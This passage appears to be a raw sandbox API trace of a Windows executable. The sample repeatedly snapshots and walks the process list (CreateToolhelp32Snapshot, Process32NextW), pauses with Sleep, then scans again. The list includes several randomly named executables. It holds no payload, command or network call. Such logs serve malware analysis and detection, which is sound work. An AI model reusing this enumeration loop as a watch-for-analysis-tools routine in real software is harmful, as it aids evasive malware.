th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0143.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0143.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0143.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0143.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0143.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0143.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0143.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0143.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0143.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0143.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0143.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0143.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0143.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0143.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0143.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0143.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0143.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0143.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0143.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0143.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0143.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0143.220] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0143.221] CloseHandle (hObject=0xbc) returned 1 [0143.221] Sleep (dwMilliseconds=0x12c) [0143.835] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0143.840] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0143.847] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.848] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.848] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.849] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.850] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.851] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.852] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.853] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.853] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.854] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.856] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.857] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0143.859] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.861] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.862] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.864] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.865] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0143.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0143.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0143.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0143.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0143.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0143.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0143.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0143.979] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0143.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0143.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0143.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0143.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0143.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0143.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0143.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0143.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0143.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0143.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0143.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.000] CloseHandle (hObject=0xc4) returned 1 [0144.000] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.006] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 